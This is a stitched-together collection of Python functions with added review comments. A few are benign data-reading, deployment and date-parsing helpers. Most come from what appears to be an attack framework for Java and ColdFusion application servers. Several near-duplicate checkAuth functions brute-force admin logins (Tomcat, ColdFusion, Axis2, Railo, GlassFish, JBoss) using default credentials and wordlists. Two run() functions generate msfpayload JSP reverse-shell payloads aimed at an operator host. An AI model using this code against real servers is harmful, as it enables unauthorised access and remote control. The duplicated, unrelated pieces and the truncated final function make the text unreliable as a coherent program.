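def wf_reader(filename, **kwargs):
    """Read a delimited text file into a float matrix with a leading time column.

    Every line is stripped and split on the ``delimeter`` keyword. Lines with
    fewer than two fields are skipped. Field 1 is kept as the time string,
    fields 2 onward as data, and field 0 is ignored.

    Keyword arguments:
        header: when true, the first kept line is returned as column names
            and left out of the matrix. Default ``False``.
        delimeter: separator handed to ``str.split``; ``None`` splits on any
            whitespace. The spelling is kept because callers pass it by
            this name.

    Returns:
        ``matrix`` when ``header`` is false, ``(names, matrix)`` when it is
        true. ``matrix`` is ``ut.timestamp(times, t0=True)`` stacked in front
        of the data columns with ``np.hstack``.
    """
    import numpy as np
    import utility as ut

    header = kwargs.get('header', False)
    delim = kwargs.get('delimeter', None)

    time, columns = [], []
    # The context manager closes the file even when a read raises; the
    # original left the handle open on any exception.
    with open(filename, 'r') as datafile:
        for line in datafile:
            fields = line.strip().split(delim)  # split once, not three times
            if len(fields) >= 2:
                time.append(fields[1])
                columns.append(fields[2:])

    if header:
        names, time, columns = columns[0], time[1:], columns[1:]

    matrix = np.array(columns, dtype='float')
    matrix = np.hstack((ut.timestamp(time, t0=True), matrix))

    if header:
        return names, matrix
    return matrix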
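def get_unix_timestamp(dt_str1, dt_str2):
    """Convert *dt_str1* to a timestamp, repairing it when parsing fails.

    The first attempt is ``utility.timestamp(dt_str1)``. If that raises and
    the message contains ``'must be in -1439'``, the zone is rebuilt with
    ``replace_TZ(dt_str1, dt_str2)`` and parsing is retried. Every remaining
    failure goes to ``fix_invalid_date``.

    The original called ``fix_invalid_date`` but dropped its result, so the
    repaired paths returned ``None``; the result is now returned.
    """
    try:
        return utility.timestamp(dt_str1)
    except Exception as err:
        # NOTE(review): presumably the parser's out-of-range UTC offset
        # message; confirm against the library utility.timestamp wraps.
        if 'must be in -1439' not in str(err):
            return fix_invalid_date(dt_str1)

    new_dt1 = replace_TZ(dt_str1, dt_str2)
    try:
        return utility.timestamp(new_dt1)
    except Exception:
        return fix_invalid_date(new_dt1)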
def define_env(settings_file_path=""):
    """Fill the global ``env`` from the settings file and derive deploy paths.

    Reads *settings_file_path* into the module-level ``config``, copies every
    option of its ``instance`` section onto ``env``, then builds the project
    path values from them. Calls ``abort`` when the file does not exist.
    """
    # Default that the settings file may override below.
    env.deploy_redcap_cron = False

    settings_found = os.path.exists(settings_file_path)
    if settings_found:
        config.read(settings_file_path)
    else:
        print(("The secrets file path cannot be found. It is set to: %s" % settings_file_path))
        abort("Secrets File not set")

    # Return value is not used here; the call is kept as in the original.
    utility.get_config('deploy_user', settings_file_path)

    for option, setting in config.items("instance"):
        env[option] = setting

    # Values with no counterpart in the ini file.
    stamp = utility.timestamp()
    project = env.project_path
    env.remote_project_name = '%s-%s' % (project, stamp)
    env.live_project_full_path = env.live_pre_path + "/" + project
    env.backup_project_full_path = env.backup_pre_path + "/" + project
    env.upload_project_full_path = env.backup_pre_path
    env.hosts = [env.host]
    env.port = env.host_ssh_port

    # The ini value arrives as text; normalise it to a boolean.
    env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
def waitServe(servert):
    """Wait up to ten seconds for the _serve thread *servert* to finish.

    A progress line is rewritten once per second while the thread is alive.
    Returns True when the thread ended before the countdown reached zero,
    False when the countdown ran out or the wait was interrupted.
    """
    remaining = 10

    try:
        while servert.is_alive() and remaining > 0:
            stdout.flush()
            stdout.write("\r\033[32m [%s] Waiting for remote server to "
                         "download file [%ds]" % (utility.timestamp(), remaining))
            sleep(1.0)
            remaining -= 1
    except:
        # Any interruption, Ctrl-C included, counts as a failed wait.
        remaining = 0

    # A progress line was printed, so finish it with a newline.
    if remaining != 10:
        print('')

    if remaining == 0:
        utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
        return False
    return True
def define_env(settings_file_path=""):
    """Load deployment settings into the global ``env``.

    The settings file is read into the module-level ``config``. A non-empty
    ``deploy_user`` becomes ``env.user``, every option in the ``instance``
    section is copied onto ``env``, and the project paths are derived from
    those values. ``abort`` is called when the file is missing.
    """
    # Default, possibly overridden by the settings file.
    env.deploy_redcap_cron = False

    if not os.path.exists(settings_file_path):
        print("The secrets file path cannot be found. It is set to: %s" % settings_file_path)
        abort("Secrets File not set")
    else:
        config.read(settings_file_path)

    if utility.get_config('deploy_user', settings_file_path) != "":
        env.user = utility.get_config('deploy_user', settings_file_path)

    for key, val in config.items("instance"):
        env[key] = val

    # Derived values that the ini file does not carry.
    run_stamp = utility.timestamp()
    project_dir = env.project_path
    env.remote_project_name = '%s-%s' % (project_dir, run_stamp)
    env.live_project_full_path = env.live_pre_path + "/" + project_dir
    env.backup_project_full_path = env.backup_pre_path + "/" + project_dir
    env.upload_project_full_path = env.backup_pre_path
    env.hosts = [env.host]
    env.port = env.host_ssh_port

    # Text from the ini file -> boolean.
    env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
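def waitServe(servert):
    """ Small function used to wait for a _serve thread to receive
    a GET request.  See _serve for more information.

    servert should be a running thread.

    Returns True when the thread ended before the ten second countdown ran
    out, False otherwise.
    """

    timeout = 10
    status = False

    try:
        while servert.is_alive() and timeout > 0:
            stdout.flush()
            stdout.write("\r\033[32m [%s] Waiting for remote server to "
                         "download file [%ds]" % (utility.timestamp(), timeout))
            sleep(1.0)
            timeout -= 1
    except:
        # Any interruption, Ctrl-C included, is treated as a failed wait.
        timeout = 0

    # Compare by value: `is` on int literals only worked through CPython's
    # small-integer cache and is a SyntaxWarning on current interpreters.
    if timeout != 10:
        # print('') emits the same bare newline on Python 2 and 3.
        print('')

    if timeout == 0:
        utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
    else:
        status = True

    return status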
def checkAuth(ip, port, title):
    """Look for working credentials on the management interface at ip:port.

    Acts only when *title* equals GINTERFACES.GAD. Tries, in order, the
    operator-supplied state.usr_auth ("user:password"), each pair in
    default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm it against the original file.
    """

    if title == GINTERFACES.GAD:

        # Plain http:// - credentials travel unencrypted to the target.
        url = 'http://{0}:{1}/management/domain'.format(ip, port)

        # check with given auth
        if state.usr_auth:
            # Two-name unpacking raises ValueError unless the value holds
            # exactly one ':'.
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url)

        # else try default creds
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # check for a supplied wordlist
        if state.bf_wordlist and not state.hasbf:

            # Set before the loop, so the wordlist pass is not repeated
            # while this flag stays set.
            state.hasbf = True
            wordlist = []
            with open(state.bf_wordlist, "r") as f:
                # NOTE(review): str.decode exists only on Python 2; with the
                # print('') calls below this looks like partly converted
                # code - confirm the target interpreter.
                wordlist = [
                    x.decode("ascii", "ignore").rstrip() for x in f.readlines()
                ]

            utility.Msg(
                "Brute forcing %s account with %d passwords..." %
                (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write(
                        "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                        % (utility.timestamp(), state.bf_user, idx + 1,
                           len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print('')

                        # Cache the pair at the front of the shared list.
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the password goes to utility.Msg in
                        # clear text, so whatever that writes to holds it.
                        utility.Msg(
                            "Successful login %s:%s" % (state.bf_user, word),
                            LOG.SUCCESS)
                        return cook

                print('')

            except KeyboardInterrupt:
                # Ctrl-C ends the wordlist pass; the function returns None.
                pass
def checkAuth(ip, port, title, version):
    """Look for working credentials on the administrator login at ip:port.

    Tries, in order, the operator-supplied state.usr_auth ("user:password"),
    each pair in default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None. *title* is not read here.

    Python 2 syntax (print statement, "except Exception, e").
    """

    # Plain http:// - credentials travel unencrypted to the target.
    url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)

    # check with given auth
    if state.usr_auth:
        # Two-name unpacking raises ValueError unless the value holds
        # exactly one ':'.
        (usr, pswd) = state.usr_auth.split(':')
        return _auth(usr, pswd, url, version)

    # else try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # if we're still here, check if they supplied a wordlist
    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []

        try:
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]
        except Exception, e:
            # An unreadable wordlist is reported and the function returns None.
            utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
            return

        utility.Msg("Brute forcing account %s with %d passwords..." %
                    (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                             % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # Cache the pair at the front of the shared list.
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass
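def checkAuth(ip, port, title, version):
    """Look for working credentials on the axis2-admin login at ip:port.

    Tries, in order, the operator-supplied state.usr_auth ("user:password"),
    each pair in default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None. *title* is not read here.

    Python 2 syntax (print statement, str.decode).
    """

    # Plain http:// - credentials travel unencrypted to the target.
    url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)

    if state.usr_auth:
        # Two-name unpacking raises ValueError unless the value holds
        # exactly one ':'.
        (usr, pswd) = state.usr_auth.split(":")
        return _auth(usr, pswd, url, version)

    # try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # bruteforce
    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, 'r') as f:
            # ensure its all ascii
            wordlist = [
                x.decode('ascii', 'ignore').rstrip() for x in f.readlines()
            ]

        utility.Msg(
            "Brute forcing %s account with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:

            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                             % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # Cache the pair at the front of the shared list.
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # The original left out the % operator, which calls the
                    # string literal and raises TypeError before `cook` is
                    # returned.
                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg("Successful login %s:%s" % (state.bf_user, word),
                                LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass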
def checkAuth(ip, port, title, version):
    """Look for working credentials on the manager interface at ip:port.

    Acts only when *title* equals TINTERFACES.MAN. Tries, in order, the
    operator-supplied state.usr_auth ("user:password"), each pair in
    default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None. *version* is not read here.

    Python 2 syntax (print statement, str.decode).

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm it against the original file.
    """

    if title == TINTERFACES.MAN:

        # Plain http:// - credentials travel unencrypted to the target.
        url = "http://{0}:{1}/manager/html".format(ip, port)

        # check with given auth
        if state.usr_auth:
            # Two-name unpacking raises ValueError unless the value holds
            # exactly one ':'.
            (usr, pswd) = state.usr_auth.split(":")
            return _auth(usr, pswd, url)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            # Set before the loop, so the wordlist pass is not repeated
            # while this flag stays set.
            state.hasbf = True
            wordlist = []
            with open(state.bf_wordlist, "r") as f:
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                        (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                 % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print ''

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the password goes to utility.Msg in
                        # clear text, so whatever that writes to holds it.
                        utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C ends the wordlist pass; the function returns None.
                pass
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords

    Picks the web or server admin URL from *title*; any other title is
    logged and the function returns None. Tries state.usr_auth when it is
    set, otherwise every line of the file named by state.bf_wordlist.
    Returns the first truthy value from _auth(), otherwise None.

    Python 2 syntax (print statement, str.decode).
    """

    url = None
    # Plain http:// - the password travels unencrypted to the target.
    # `is` compares identity, so title must be the same object as the
    # RINTERFACES member.
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
    else:
        utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
        return

    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        if ':' in state.usr_auth:
            # Raises ValueError when the value holds more than one ':'.
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)

    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, "r") as f:
            wordlist = [
                x.decode("ascii", "ignore").rstrip() for x in f.readlines()
            ]

        utility.Msg(
            "Brute forcing %s with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write(
                    "\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                    % (utility.timestamp(), state.bf_user, idx + 1,
                       len(wordlist)))

                cook = _auth(word, url, title)
                if cook:
                    print ''
                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass
def checkAuth(ip, port, title):
    """Look for working credentials on the management interface at ip:port.

    Acts only when *title* equals GINTERFACES.GAD. Tries, in order, the
    operator-supplied state.usr_auth ("user:password"), each pair in
    default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None.

    Python 2 syntax (print statement, str.decode).

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm it against the original file.
    """

    if title == GINTERFACES.GAD:

        # Plain http:// - credentials travel unencrypted to the target.
        url = 'http://{0}:{1}/management/domain'.format(ip, port)

        # check with given auth
        if state.usr_auth:
            # Two-name unpacking raises ValueError unless the value holds
            # exactly one ':'.
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url)

        # else try default creds
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url)
            if cook:
                return cook

        # check for a supplied wordlist
        if state.bf_wordlist and not state.hasbf:

            # Set before the loop, so the wordlist pass is not repeated
            # while this flag stays set.
            state.hasbf = True
            wordlist = []
            with open(state.bf_wordlist, "r") as f:
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                        (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                 % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url)
                    if cook:
                        print ''

                        # Cache the pair at the front of the shared list.
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the password goes to utility.Msg in
                        # clear text, so whatever that writes to holds it.
                        utility.Msg("Successful login %s:%s" % (state.bf_user, word), LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C ends the wordlist pass; the function returns None.
                pass
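def checkAuth(ip, port, title, version):
    """Look for working credentials on the axis2-admin login at ip:port.

    Tries, in order, the operator-supplied state.usr_auth ("user:password"),
    each pair in default_credentials, then every line of the file named by
    state.bf_wordlist as a password for state.bf_user. Returns the first
    truthy value from _auth(), otherwise None. *title* is not read here.

    Python 2 syntax (print statement, str.decode).
    """

    # Plain http:// - credentials travel unencrypted to the target.
    url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)

    if state.usr_auth:
        # Two-name unpacking raises ValueError unless the value holds
        # exactly one ':'.
        (usr, pswd) = state.usr_auth.split(":")
        return _auth(usr, pswd, url, version)

    # try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # bruteforce
    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, 'r') as f:
            # ensure its all ascii
            wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]

        utility.Msg("Brute forcing %s account with %d passwords..." %
                    (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:

            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                             % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # Cache the pair at the front of the shared list.
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # The original left out the % operator, which calls the
                    # string literal and raises TypeError before `cook` is
                    # returned.
                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg("Successful login %s:%s" % (state.bf_user, word),
                                LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass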
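def backup_database(options=""):
    """
    Backup a mysql database from the remote host with mysqldump options in *options*.

    The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz'
    The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz'

    The remote my.cnf written at the start is removed again in a ``finally``
    block, so a failed dump no longer leaves it on the host.
    """
    # NOTE(review): mysqldump gets no password on its command line, so the
    # file written here presumably carries the database credentials -
    # confirm in utility.write_remote_my_cnf.
    utility.write_remote_my_cnf()
    try:
        now = utility.timestamp()
        with settings(user=env.deploy_user):
            # NOTE(review): *options* and the env values are interpolated
            # into the shell command unquoted. *options* is meant to expand
            # to several words; the env values come from the settings file
            # and must not contain shell metacharacters.
            # NOTE(review): the exit status of a pipeline is that of its
            # last command (gzip) unless pipefail is set, so a failing
            # mysqldump can still leave a plausible-looking .gz behind.
            run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \
                (options, env.database_user, env.database_host, env.database_name, env.instance_name, now))
            run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" % (env.instance_name, now, env.instance_name))
    finally:
        # Runs on success, on an exception and on a fabric abort alike.
        utility.delete_remote_my_cnf()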
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

    Reads remote_os, remote_service and generate_payload ("host:port") from
    *options*, shells out to the external msfpayload program, and records the
    generation time, host:port and payload name in ./src/lib/shell.log.
    Returns None on every path.
    """

    if not options.remote_os:
        utility.Msg("Please specify a remote os (-o)", LOG.ERROR)
        return

    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"

    # An empty `which` result is taken to mean the tool is not installed.
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    payload = fetch_payload(options)
    # NOTE(review): as listed, this assignment is unconditional and replaces
    # the coldfusion value set above - confirm against the original file.
    out = "W > shell.war"

    if not payload:
        # NOTE(review): `fingerengine` is neither a parameter nor a local;
        # unless it is a module global this line raises NameError.
        utility.Msg(
            "Platform %s unsupported" % fingerengine.options.remote_service,
            LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # Two-name unpacking raises ValueError unless the value holds exactly
    # one ':'.
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): the values are formatted into a shell command string
    # unquoted; getoutput hands the whole string to the shell.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
                     (payload, lhost, lport, out))

    if "Created by" in resp:
        utility.Msg("Payload generated (%s).  Payload: %s" %
                    (out.split(' ')[2], payload))

        # also log some auxiliary information
        # The first write truncates shell.log; the next two append.
        getoutput("echo Generated at %s > ./src/lib/shell.log" %
                  utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (payload))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords

    Picks the web or server admin URL from *title*; any other title is
    logged and the function returns None. Tries state.usr_auth when it is
    set, otherwise every line of the file named by state.bf_wordlist.
    Returns the first truthy value from _auth(), otherwise None.

    Python 2 syntax (print statement, str.decode).
    """

    url = None
    # Plain http:// - the password travels unencrypted to the target.
    # `is` compares identity, so title must be the same object as the
    # RINTERFACES member.
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
    else:
        utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
        return

    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        if ':' in state.usr_auth:
            # Raises ValueError when the value holds more than one ':'.
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)

    if state.bf_wordlist and not state.hasbf:

        # Set before the loop, so the wordlist pass is not repeated while
        # this flag stays set.
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, "r") as f:
            wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

        utility.Msg("Brute forcing %s with %d passwords..." %
                    (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                             % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))

                cook = _auth(word, url, title)
                if cook:
                    print ''
                    # NOTE(review): the password goes to utility.Msg in clear
                    # text, so whatever that writes to holds it.
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C ends the wordlist pass; the function returns None.
            pass
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

    Reads remote_service and generate_payload ("host:port") from *options*,
    shells out to the external msfpayload program, and records the generation
    time, host:port and payload name in ./src/lib/shell.log. Returns None on
    every path.
    """

    PAYLOAD = "java/jsp_shell_reverse_tcp"

    # `out` is the output-format letter plus a shell redirection; it is
    # pasted into the command line below.
    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"
    else:
        out = "W > shell.war"

    # An empty `which` result is taken to mean the tool is not installed.
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # Two-name unpacking raises ValueError unless the value holds exactly
    # one ':'.
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): the values are formatted into a shell command string
    # unquoted; getoutput hands the whole string to the shell.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
                     (PAYLOAD, lhost, lport, out))

    if "Created by" in resp:
        utility.Msg("Payload generated (%s).  Payload: %s" %
                    (out.split(' ')[2], PAYLOAD))

        # also log some auxiliary information
        # The first write truncates shell.log; the next two append.
        getoutput("echo Generated at %s > ./src/lib/shell.log" %
                  utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
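def get_unix_timestamp(dt_str):
    """Convert *dt_str* to a timestamp, falling back to ``fix_invalid_date``.

    The original called ``fix_invalid_date`` on failure but dropped its
    result, so every repaired value came back as ``None``; the result is now
    returned.
    """
    try:
        return utility.timestamp(dt_str)
    except Exception:
        # Best effort: any parse failure is handed to the repair helper.
        return fix_invalid_date(dt_str)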
def fix_invalid_date(dt_str):
    """Return a timestamp for a date string that failed to parse.

    Handles a datetime with a wrong TZ or a date older than 1970-01-01: the
    first 19 characters are re-parsed with a +00:00 offset, and if that also
    fails the timestamp of 1970-01-01T00:00:00+00:00 is returned.
    """
    epoch = '1970-01-01T00:00:00+00:00'
    try:
        # Built inside the try so a non-sliceable value also falls back.
        utc_guess = dt_str[:19] + '+00:00'
        fixed = utility.timestamp(utc_guess)
    except Exception:
        fixed = utility.timestamp(epoch)
    return fixed
def checkAuth(ip, port, title, version):
    """Look for working credentials on a console at ip:port.

    For versions 5.1, 6.0 and 6.1 with the JINTERFACES.WM title, each pair
    in default_credentials is posted to the admin-console login form and a
    (cookie dict, None) tuple is returned on HTTP 200. For every other
    combination the URL is chosen from *title* and the order is
    state.usr_auth, default_credentials, then each line of the file named by
    state.bf_wordlist for state.bf_user, returning the first truthy value
    from _auth(). Returns None when nothing succeeds.

    NOTE(review): block nesting was reconstructed from a flattened listing;
    confirm it against the original file.
    """

    if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
        for (usr, pswd) in default_credentials:
            # Plain http:// - credentials travel unencrypted to the target.
            url = "http://%s:%s/admin-console/login.seam" % (ip, port)
            data = OrderedDict([
                ("login_form", "login_form"),
                ("login_form:name", usr),
                ("login_form:password", pswd),
                ("login_form:submit", "Login"),
                ("javax.faces.ViewState", utility.fetch_viewState(url)),
            ])

            response = utility.requests_post(url, data=data)
            if response.status_code == 200:
                utility.Msg(
                    "Successfully authenticated with %s:%s" % (usr, pswd),
                    LOG.DEBUG)
                # 5.1 takes the cookies from the first response in the
                # redirect history rather than from the final one.
                if version in ["5.1"]:
                    return (dict_from_cookiejar(response.history[0].cookies),
                            None)
                return (dict_from_cookiejar(response.cookies), None)

    else:
        if title is JINTERFACES.JMX:
            url = "http://%s:%s/jmx-console/" % (ip, port)
        elif title is JINTERFACES.MM:
            url = "http://%s:%s/management" % (ip, port)
        elif title is JINTERFACES.WC:
            url = "http://%s:%s/web-console" % (ip, port)
        else:
            utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
            return

        # check with given auth
        if state.usr_auth:
            # Two-name unpacking raises ValueError unless the value holds
            # exactly one ':'.
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url, version)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url, version)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            # Set before the loop, so the wordlist pass is not repeated
            # while this flag stays set.
            state.hasbf = True
            wordlist = []
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                # NOTE(review): str.decode exists only on Python 2; with the
                # print('') calls below this looks like partly converted
                # code - confirm the target interpreter.
                wordlist = [
                    x.decode("ascii", "ignore").rstrip() for x in f.readlines()
                ]

            utility.Msg(
                "Brute forcing %s account with %d passwords..."
                % (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
